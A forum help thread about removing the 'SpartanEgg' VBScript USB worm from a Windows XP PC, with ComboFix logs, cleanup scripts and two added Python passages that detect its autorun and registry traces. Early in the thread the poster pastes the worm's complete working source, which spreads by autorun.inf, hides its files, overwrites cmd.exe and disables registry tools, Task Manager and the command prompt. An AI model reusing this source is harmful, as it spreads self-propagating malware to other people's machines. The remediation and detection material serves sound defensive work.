I don't know what this is (virus, spyware, malware, etc.) but it is on my PC running Windows XP. I first noticed this thing when my KIS7 detected it as a trojan but was not able to quarantine or delete it because it reported that "the file does not exist." Then it prompted me to roll back the action purportedly done by this trojan, and my PC ran normally. The next day, my son was playing a game on my PC when suddenly it froze. That's when I discovered that the trojan came back again and was allowed to run by my son (he didn't know of course what it is). I checked KIS7 and there I found out that it is Spartanegg11.log.vbs. I ran a full scan but still it remained 'untreated'. So I copied its path and ran WinPE. I ran regedit and deleted every occurrence of spartanegg11.log.vbs. My PC returns to normal... maybe for now. I don't know if I've done the right thing. I hope so. But this I noticed: every time I double-click my drives (C&D) I get a message that spartanegg11.log.vbs is missing and I can't open it this way. Is there a way to fix this? For any help on this, I thank you. Here's the copy of the SpartanEgg11.log.vbs:

'This is just a modified version! 'mabuhay ang Pilipinas! 'Spartan Egg By: Charlie Delta---Bacolod City--April 2008 'Oink...6100 phils.
On Error Resume Next Dim mydate, myvbsalias, myvbsfile, mysource, winpath, winsyspath, flashdrive, fs, mycmdfile, cmd, atr, tf, rg, nt, check, sd mycmdfile = "cmd.exe" mydate = month(now()) myvbsalias = "SpartanEgg" & mydate myvbsfile = myvbsalias & ".log.vbs" atr = "[autorun]" & vbCrLf & _ "shellexecute=wscript.exe " & myvbsfile Set fs = CreateObject("Scripting.FileSystemObject") Dim mf, text, size Set mf = fs.GetFile(WScript.ScriptFullname) size = mf.size check = mf.Drive.drivetype Set text = mf.openastextstream(1, -2) Do While Not text.atendofstream mysource = mysource & text.readline mysource = mysource & vbCrLf Loop Do Set winpath = fs.GetSpecialFolder(0) Set tf = fs.GetFile(winpath & "\" & myvbsfile) tf.Attributes = 32 Set tf = fs.CreateTextFile(winpath & "\" & myvbsfile, 2, True) tf.Write mysource tf.Close Set tf = fs.GetFile(winpath & "\" & myvbsfile) tf.Attributes = 39 If (mydate = "12") Then Set winsyspath = fs.GetSpecialFolder(1) cmd = "@echo off" & vbCrLf & _ "wscript " & winpath & "\" & myvbsfile Set tf = fs.GetFile(winsyspath & "\" & mycmdfile) tf.Attributes = 32 Set tf = fs.CreateTextFile(winsyspath & "\" & mycmdfile, 2) tf.Write cmd tf.Close End If dim myday myday = day(now())& hour(now())& minute(now()) if (myday = "131515") Then msgbox "13th day on 15:15 hr Cracked!?...By: ©Spartan Egg™" End If For Each flashdrive In fs.drives If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And flashdrive.Path <> "A:" Then Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile) tf.Attributes = 32 Set tf = fs.CreateTextFile(flashdrive.Path & "\" & myvbsfile, 2, True) tf.Write mysource tf.Close Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile) tf.Attributes = 39 Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf") tf.Attributes = 32 Set tf = fs.CreateTextFile(flashdrive.Path & "\autorun.inf", 2, True) tf.Write atr tf.Close Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf") tf.Attributes = 39 End If Next Set rg = CreateObject("WScript.Shell") 
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\Di sableRegistryTools", 1, "REG_DWORD" rg.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSConfig", winpath & "\" & myvbsfile rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "Hacked By: © Spartan Egg™...6100 phils.!mabuhay ang Pilipinas!" rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\Di sableTaskMgr", 1, "REG_DWORD" rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced \Folder\Hidden\SHOWALL\CheckedValue", 0, "REG_DWORD" rg.RegWrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD", 1, "REG_DWORD" If check <> 1 Then WScript.sleep 8000 End If Loop While (check <> 1) Set sd = CreateObject("WScript.Shell") sd.run winpath & "\explorer.exe /e,/select, " & WScript.ScriptFullname
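The script posted above spreads by dropping a copy of itself plus an autorun.inf with a "shellexecute=wscript.exe <name>.log.vbs" line onto every fixed and removable drive, and it sets the dropped files' attributes to 39 (ReadOnly, Hidden, System, Archive) so Explorer does not show them. The "drive cannot be opened by double-click" symptom described in the post is exactly what happens when the autorun.inf survives but its target script has been deleted: Explorer still honours the shellexecute line. The following Python, added here as an illustration and not part of the original post or of any tool named in the thread, parses an autorun.inf, flags launch lines that hand control to a script host or script file, reports targets that are referenced but no longer present on the drive root, and decodes the attribute bitmask. The two autorun.inf samples and the drive-root listings are constructed for the example; the file names mirror the ones named in the thread.

```python
import configparser
import re

# Constructed sample mirroring what the posted script writes to each drive root:
# "[autorun]" + CRLF + "shellexecute=wscript.exe " + myvbsfile. Not a real capture.
SAMPLE_WORM_INF = "[autorun]\r\nshellexecute=wscript.exe SpartanEgg11.log.vbs\r\n"

# Constructed benign sample for contrast: a typical vendor CD launcher.
SAMPLE_BENIGN_INF = "[autorun]\r\nopen=setup.exe\r\nicon=setup.exe,0\r\n"

# Interpreters and extensions that should never be launched straight from a drive root.
SCRIPT_HOSTS = {"wscript", "cscript", "mshta", "cmd", "powershell"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta", ".bat", ".cmd")
LAUNCH_KEYS = {"open", "shellexecute"}

# FileSystemObject File.Attributes bits; the posted script sets 39 = 1|2|4|32.
FILE_ATTRIBUTES = {1: "ReadOnly", 2: "Hidden", 4: "System", 16: "Directory", 32: "Archive"}


def parse_autorun(text):
    """Return {key: command} for the launch lines in an autorun.inf.

    Covers open=, shellexecute= and shell\\<verb>\\command= under [autorun].
    Keys are lower-cased because Explorer treats them case-insensitively.
    """
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str.lower
    cp.read_string(text)
    commands = {}
    for section in cp.sections():
        if section.lower() != "autorun":
            continue
        for key, value in cp.items(section):
            if key in LAUNCH_KEYS or (key.startswith("shell\\") and key.endswith("\\command")):
                commands[key] = value.strip()
    return commands


def _basename_no_ext(token):
    """'wscript.exe' -> 'wscript', 'C:\\x\\setup.exe' -> 'setup'."""
    base = token.strip('"').rsplit("\\", 1)[-1]
    return base.rsplit(".", 1)[0].lower()


def suspicious_commands(commands):
    """Return (key, command, reason) for launch lines that run a script host or script file."""
    findings = []
    for key, cmd in commands.items():
        tokens = cmd.split()
        if not tokens:
            continue
        if _basename_no_ext(tokens[0]) in SCRIPT_HOSTS:
            findings.append((key, cmd, "launches script host " + _basename_no_ext(tokens[0])))
        elif any(t.strip('"').lower().endswith(SCRIPT_EXTS) for t in tokens):
            findings.append((key, cmd, "runs a script file"))
    return findings


def dangling_targets(commands, root_listing):
    """Files an autorun.inf references that are not present on the drive root.

    A non-empty result reproduces the post's symptom: the script was deleted
    but the autorun.inf still points at it, so double-clicking the drive fails.
    """
    present = {name.lower() for name in root_listing}
    missing = []
    for cmd in commands.values():
        for token in cmd.split():
            name = token.strip('"')
            # Skip the interpreter itself and anything that is not a file name.
            if "." not in name or _basename_no_ext(name) in SCRIPT_HOSTS:
                continue
            if name.lower() not in present:
                missing.append(name)
    return missing


def decode_attributes(value):
    """Decode a File.Attributes bitmask into flag names, lowest bit first."""
    return [name for bit, name in sorted(FILE_ATTRIBUTES.items()) if value & bit]


if __name__ == "__main__":
    cmds = parse_autorun(SAMPLE_WORM_INF)
    for key, cmd, reason in suspicious_commands(cmds):
        print(f"{key}={cmd}  <- {reason}")
    print("missing targets:", dangling_targets(cmds, ["autorun.inf"]))
    print("attributes 39:", decode_attributes(39))
```

The dangling-target check is the one to run before deleting a dropped script by hand: removing the .vbs while leaving the autorun.inf behind is what produced the "file is missing" dialog in the post, and the ComboFix run later in the thread cleared it by deleting C:\autorun.inf and D:\Autorun.inf together with the script.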
Hey donex7

Now, please download ComboFix. With ComboFix, at the download window, please rename it to Combo-Fix(.exe) before downloading it. Save it to your Desktop.

Please disable all security programs, such as antiviruses, antispywares, and firewalls.

• Run Combo-Fix.exe and follow the prompts.
• Accept the End-User License Agreement.
• Allow the Recovery Console to be installed.
• When you see the window below, click on Yes.
• When the Recovery Console has been installed, click on Yes to start the scan.

**Understand that things like your system clock changing and your desktop disappearing might happen. Do not worry, because all will be restored later.

• Wait for the scan to be fully completed.
• If it requires a reboot, please do so.
• After the scan has completed entirely, please post the log here. The log will be located at C:\ComboFix(.txt)

Do not click on the ComboFix window, as it may cause it to stall.

Best Regards
Hello cdavfrew,

Thank you for taking time helping me out of this trouble. I just finished doing what you said. I suspect that I got this SpartanEgg11.log.vbs from my workplace because my flash drive is infected. When I inserted it last night KIS7 detected it once again but still was not able to delete it but rolled back the action of this virus/malware. I already reformatted my flash drive. Here's the log of ComboFix:

ComboFix 08-11-27.01 - Donex 2008-11-27 22:07:26.1 - NTFSx86
Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.1332 [GMT -8:00]
Running from: D:\Malware Tool\Combo-Fix.exe
* Created a new restore point
WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !!
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
C:\autorun.inf
D:\Autorun.inf
.
((((((((((((((((((((((((( Files Created from 2008-10-28 to 2008-11-28 )))))))))))))))))))))))))))))))
.
2008-11-27 22:09 . 2008-11-27 22:10 114 -rahs---- C:\autorun.inf
2008-11-27 21:07 . 2008-11-27 22:10 7,056 -rahs---- C:\WINDOWS\SpartanEgg11.log.vbs
2008-11-27 21:07 . 2008-11-27 22:10 7,056 -rahs---- C:\SpartanEgg11.log.vbs
2008-11-26 20:19 . 2008-11-26 20:19 68,096 --a------ C:\WINDOWS\ScUnin.exe
2008-11-26 20:19 . 2008-11-26 20:20 12,265 --a------ C:\WINDOWS\scunin.dat
2008-11-26 20:19 . 2008-11-26 20:19 967 --a------ C:\WINDOWS\ScUnin.pif
2008-11-26 20:18 . 2008-11-27 19:54 <DIR> d-------- C:\Program Files\Starcraft
2008-11-26 08:57 . 2008-11-26 08:57 <DIR> d-------- C:\Program Files\inKline Global
2008-11-26 08:55 . 2008-11-26 08:55 <DIR> d-------- C:\Documents and Settings\Donex\Application Data\Media Player Classic
2008-11-26 08:53 . 2008-11-26 08:53 <DIR> d-------- C:\Program Files\Foxit Software
2008-11-26 08:44 . 2008-11-26 08:44 <DIR> d-------- C:\Program Files\K-Lite Codec Pack
2008-11-26 08:34 . 2008-11-26 08:34 <DIR> d--hs---- C:\Diskeeper
2008-11-26 08:23 . 2008-11-26 08:23 <DIR> d-------- C:\Program Files\Diskeeper Corporation
2008-11-26 07:59 . 2008-11-26 08:08 <DIR> d-------- C:\Program Files\Winamp
2008-11-26 07:59 . 2005-12-04 21:12 20,640 --------- C:\WINDOWS\system32\drivers\PxHelp20.sys
2008-11-26 07:55 . 2008-11-26 07:55 <DIR> d-------- C:\WINDOWS\Modio
2008-11-26 07:55 . 2002-01-29 04:28 220,432 -ra------ C:\WINDOWS\system32\drivers\slntamr.sys
2008-11-26 07:55 . 2002-01-29 04:28 220,432 --a--c--- C:\WINDOWS\system32\dllcache\slntamr.sys
2008-11-26 07:55 . 2001-11-29 08:10 33,028 -ra------ C:\WINDOWS\system32\drivers\slwdmsup.sys
2008-11-26 07:55 . 2001-11-29 08:10 33,028 --a--c--- C:\WINDOWS\system32\dllcache\slwdmsup.sys
2008-11-26 07:55 . 2001-08-17 13:57 16,128 --a------ C:\WINDOWS\system32\drivers\MODEMCSA.sys
2008-11-26 07:55 . 2001-08-17 13:57 16,128 --a--c--- C:\WINDOWS\system32\dllcache\modemcsa.sys
2008-11-25 22:13 . 2008-11-25 22:13 <DIR> d-------- C:\Documents and Settings\Donex\Application Data\ATI
2008-11-25 22:13 . 2008-11-25 22:13 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\ATI
2008-11-25 22:02 . 2008-11-25 22:02 <DIR> d-------- C:\Documents and Settings\Administrator
2008-11-24 21:56 . 2005-04-15 10:58 1,351,392 --a------ C:\WINDOWS\system32\COMCTL32.OCX
2008-11-24 21:56 . 2007-03-12 07:16 1,146,184 --a------ C:\WINDOWS\system32\FM20.DLL
2008-11-24 21:56 . 2005-04-15 10:58 1,071,088 --a------ C:\WINDOWS\system32\MSCOMCTL.OCX
2008-11-24 21:56 . 2007-03-12 07:16 212,240 --a------ C:\WINDOWS\system32\RICHTX32.OCX
2008-11-24 21:56 . 2007-03-12 07:16 152,848 --a------ C:\WINDOWS\system32\COMDLG32.OCX
2008-11-24 21:56 . 2007-03-12 07:16 40,960 --a------ C:\WINDOWS\system32\SSUBTMR6.DLL
2008-11-24 21:56 . 2007-03-12 07:16 32,584 --a------ C:\WINDOWS\system32\FM20ENU.DLL
2008-11-24 21:56 . 2007-03-12 07:16 10,752 --a------ C:\WINDOWS\system32\aamd532.dll
2008-11-24 21:47 . 2008-11-24 21:56 <DIR> d-------- C:\Program Files\AutoPatcher
2008-11-24 21:06 . 2008-11-24 21:57 <DIR> d-------- C:\XP Auto Patcher
2008-11-24 21:03 . 2008-11-24 21:04 <DIR> d-------- C:\XP Drivers
2008-11-24 14:32 . 2004-08-03 23:08 31,616 --a------ C:\WINDOWS\system32\drivers\usbccgp.sys
2008-11-24 14:32 . 2004-08-03 23:08 31,616 --a--c--- C:\WINDOWS\system32\dllcache\usbccgp.sys
2008-11-24 14:29 . 2008-11-24 14:29 <DIR> d-------- C:\Program Files\Malwarebytes' Anti-Malware
2008-11-24 14:29 . 2008-11-24 14:29 <DIR> d-------- C:\Documents and Settings\Donex\Application Data\Malwarebytes
2008-11-24 14:29 . 2008-11-24 14:29 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Malwarebytes
2008-11-24 14:29 . 2008-10-22 16:10 38,496 --a------ C:\WINDOWS\system32\drivers\mbamswissarmy.sys
2008-11-24 14:29 . 2008-10-22 16:10 15,504 --a------ C:\WINDOWS\system32\drivers\mbam.sys
2008-11-24 14:26 . 2008-11-24 14:26 <DIR> d-------- C:\WINDOWS\system32\SupportAppXL
2008-11-24 14:26 . 2008-11-26 10:28 <DIR> d-------- C:\Program Files\SMART BRO
2008-11-24 14:26 . 2008-03-18 16:12 105,088 --a------ C:\WINDOWS\system32\drivers\ZTEusbser6k.sys
2008-11-24 14:26 . 2008-03-18 16:12 105,088 --a------ C:\WINDOWS\system32\drivers\ZTEusbnmeaext.sys
2008-11-24 14:26 . 2008-03-18 16:12 105,088 --a------ C:\WINDOWS\system32\drivers\ZTEusbnmea.sys
2008-11-24 14:26 . 2008-03-18 16:12 105,088 --a------ C:\WINDOWS\system32\drivers\ZTEusbmdm6k.sys
2008-11-24 14:25 . 2004-08-03 23:08 26,496 --a--c--- C:\WINDOWS\system32\dllcache\usbstor.sys
2008-11-24 14:08 . 2008-11-24 14:08 <DIR> d-------- C:\Program Files\Kaspersky Lab
2008-11-24 14:08 . 2008-11-27 19:55 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Kaspersky Lab
2008-11-24 14:08 . 2008-11-27 22:10 2,406,688 --ahs---- C:\WINDOWS\system32\drivers\fidbox.dat
2008-11-24 14:08 . 2008-11-24 18:11 96,976 --a------ C:\WINDOWS\system32\drivers\klin.dat
2008-11-24 14:08 . 2008-11-24 18:11 87,855 --a------ C:\WINDOWS\system32\drivers\klick.dat
2008-11-24 14:08 . 2008-11-27 22:09 51,488 --ahs---- C:\WINDOWS\system32\drivers\fidbox2.dat
2008-11-24 14:08 . 2008-11-27 22:09 35,276 --ahs---- C:\WINDOWS\system32\drivers\fidbox.idx
2008-11-24 14:08 . 2008-11-27 22:09 6,824 --ahs---- C:\WINDOWS\system32\drivers\fidbox2.idx
2008-11-24 14:07 . 2008-11-24 14:07 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Kaspersky Lab Setup Files
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2008-11-26 16:57 --------- d--h--w C:\Program Files\InstallShield Installation Information
2008-11-25 02:11 112,144 ----a-w C:\WINDOWS\system32\drivers\kl1.sys
2008-11-24 21:42 315,392 ----a-w C:\WINDOWS\HideWin.exe
2008-11-24 21:42 --------- d-----w C:\Program Files\Realtek
2008-11-24 21:40 --------- d-----w C:\Program Files\ATI Technologies
2008-11-24 21:39 --------- d-----w C:\Program Files\Common Files\ATI Technologies
2008-11-24 21:32 --------- d-----w C:\Program Files\Common Files\InstallShield
2008-11-24 21:15 --------- d-----w C:\Program Files\microsoft frontpage
2008-09-16 00:14 3,596,288 ----a-w C:\WINDOWS\system32\qt-dx331.dll
2008-09-16 00:12 81,920 ----a-w C:\WINDOWS\system32\dpl100.dll
2008-09-16 00:11 683,520 ----a-w C:\WINDOWS\system32\divx.dll
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"StartCCC"="C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2008-01-21 12:17 61440]
"Malwarebytes' Anti-Malware"="C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe" [2008-10-22 16:10 399504]
"DiskeeperSystray"="C:\Program Files\Diskeeper Corporation\Diskeeper\DkIcon.exe" [2006-10-04 12:38 163840]
"MSConfig"="C:\WINDOWS\SpartanEgg11.log.vbs" [2008-11-27 22:11 7056]
"AVP"="C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 7.0\avp.exe" [2008-02-08 18:36 227856]
"RTHDCPL"="RTHDCPL.EXE" [2008-02-18 23:34 16858112 C:\WINDOWS\RTHDCPL.exe]

C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
Reboot.exe [2006-12-29 02:35:16 409088]

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\system]
"DisableRegistryTools"= 1 (0x1)
"DisableTaskMgr"= 1 (0x1)

[HKEY_LOCAL_MACHINE\software\microsoft\security center]
"AntiVirusDisableNotify"=dword:00000001
"UpdatesDisableNotify"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\KasperskyAntiVirus]
"DisableMonitoring"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=

R2 Autorun CDROM Monitor;Autorun CDROM Monitor;C:\WINDOWS\system32\SupportAppXL\cdrom_mon.exe [2008-11-24 14:26:04 81920]
R2 MBAMService;MBAMService;"C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe" [2008-11-24 14:29:16 170640]
R3 AtiHdmiService;ATI Function Driver for HDMI Service;C:\WINDOWS\system32\drivers\AtiHdmi.sys [2008-11-24 13:34:28 84992]
R3 klim5;Kaspersky Anti-Virus NDIS Filter;C:\WINDOWS\system32\DRIVERS\klim5.sys [2007-12-13 13:28:40 24592]
R3 MBAMProtector;MBAMProtector;\??\C:\WINDOWS\system32\drivers\mbam.sys [2008-11-24 14:29:17 15504]
S3 V90drv;v90drv;C:\WINDOWS\system32\DRIVERS\v90drv.sys [2001-11-29 08:10:32 1432836]

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{aad10dfe-ba74-11dd-b6ff-001e90b232a0}]
\Shell\AutoRun\command - F:\AutoRun.exe
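The "Reg Loading Points" part of the ComboFix log above is where the persistence shows: a Run value named "MSConfig" that points at a .vbs under C:\WINDOWS rather than at the real msconfig.exe, plus DisableRegistryTools and DisableTaskMgr set to 1 under the HKCU policies key, which is what locked the poster out of regedit and Task Manager. Both are the registry writes visible in the script posted earlier. The following Python, added here as an illustration and not part of the original thread or of ComboFix, reads the REGEDIT4-style section ComboFix prints, normalises the value syntaxes it uses ("dword:00000001" and "1 (0x1)"), and flags Run entries whose target is a script file and restrictive policy values that are switched on. The input is an excerpt of the log above, trimmed to the relevant entries.

```python
import re

# Excerpt of the "Reg Loading Points" section from the ComboFix log posted above,
# trimmed to the entries relevant to the worm (values copied from the log as posted).
SAMPLE_REG_POINTS = r'''
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"StartCCC"="C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2008-01-21 12:17 61440]
"MSConfig"="C:\WINDOWS\SpartanEgg11.log.vbs" [2008-11-27 22:11 7056]
"AVP"="C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 7.0\avp.exe" [2008-02-08 18:36 227856]

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\system]
"DisableRegistryTools"= 1 (0x1)
"DisableTaskMgr"= 1 (0x1)

[HKEY_LOCAL_MACHINE\software\microsoft\security center]
"AntiVirusDisableNotify"=dword:00000001
"UpdatesDisableNotify"=dword:00000001
'''

SECTION_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"([^"]+)"\s*=\s*(.*)$')

# Script types that have no business being an autostart target on a workstation.
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta", ".bat", ".cmd")

# Policy/notification values that malware commonly sets to 1 to hinder cleanup.
RESTRICTIVE_POLICIES = {
    "DisableRegistryTools", "DisableTaskMgr", "DisableCMD",
    "AntiVirusDisableNotify", "UpdatesDisableNotify", "DisableMonitoring",
}


def normalize_value(raw):
    """Turn ComboFix's value spellings into an int or a plain string."""
    raw = raw.strip()
    if raw.lower().startswith("dword:"):          # dword:00000001
        return int(raw[6:], 16)
    m = re.match(r"^(\d+)\s*\(0x[0-9a-fA-F]+\)$", raw)  # 1 (0x1)
    if m:
        return int(m.group(1))
    # String data: drop the trailing "[date time size]" annotation and the quotes.
    raw = re.sub(r"\s*\[[^\]]*\]$", "", raw)
    return raw.strip('"')


def parse_reg_points(text):
    """Return {key_path: {value_name: data}} for the REGEDIT4-style block."""
    result, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1)
            result.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            result[current][m.group(1)] = normalize_value(m.group(2))
    return result


def flag_script_autostarts(points):
    """(value_name, target) for Run/RunOnce entries whose target is a script file."""
    hits = []
    for key, values in points.items():
        if "\\currentversion\\run" not in key.lower():
            continue
        for name, data in values.items():
            if isinstance(data, str) and data.lower().endswith(SCRIPT_EXTS):
                hits.append((name, data))
    return hits


def flag_restrictive_policies(points):
    """(key_path, value_name) for lockout/notification-suppression values set to 1."""
    return [
        (key, name)
        for key, values in points.items()
        for name, data in values.items()
        if name in RESTRICTIVE_POLICIES and data == 1
    ]


if __name__ == "__main__":
    points = parse_reg_points(SAMPLE_REG_POINTS)
    for name, target in flag_script_autostarts(points):
        print(f"autostart {name!r} runs a script: {target}")
    for key, name in flag_restrictive_policies(points):
        print(f"policy set: {name} under {key}")
```

The value name "MSConfig" is the tell here: the legitimate msconfig is never registered as a Run value under that name, so a script-file target under a trusted-looking name is exactly the pattern an autostart review should surface before anyone asks the poster to clean it.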
Hey donex7

Sorry for the late reply...

Please disable all security programs, such as antiviruses, antispywares, and firewalls. Also disable your internet connection.

Open Notepad and copy/paste the text in the code box below into it:

Code:
File::
C:\autorun.inf
C:\WINDOWS\SpartanEgg11.log.vbs
C:\SpartanEgg11.log.vbs
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Reboot.exe

Registry::
[-HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{aad10dfe-ba74-11dd-b6ff-001e90b232a0}]

• Save this as CFScript.txt in the same folder as ComboFix.
• Then drag the CFScript.txt into Combo-Fix.exe.
• This will start ComboFix again.

After reboot, (in case it asks to reboot), post the ComboFix log here. The log will be located at C:\ComboFix(.txt). Do not click on the ComboFix window, as it may cause it to stall.

Any more problems?

Best Regards
To cdavfrew,

My PC is clean now after I've done all that you said. I did not bother to post the log here anymore as it only reported that it deleted Spartanegg11.log.vbs in Drive C and C:\WINDOWS, and also deleted Reboot.exe and the mountpoints2 autorun... that's all. I've tried to access the following: run command, task manager, DOS, and yes I can already access all of them, which I was not able to when Spartanegg11.log.vbs was still in command. I can also reset the attributes of the folders/files now to hidden or shown... before it was always hidden. And most of all, my PC speed has returned to normal. No more freezing/delaying time. Now what can I say? It's a big, big thanks to you.

My best regards..
Hey donex7

Glad to hear that your problem is fixed, and there's really no need for the ComboFix log anymore. However, I'd like you to follow one final instruction: find this folder, C:\Qoobox, zip it up, and upload it to http://www.uploadmalware.com/

Best Regards
To cdavfrew,

Sorry for the delayed response. Just want to thank you again and to let you know that I've already uploaded the requested file to the link you provided. All the best..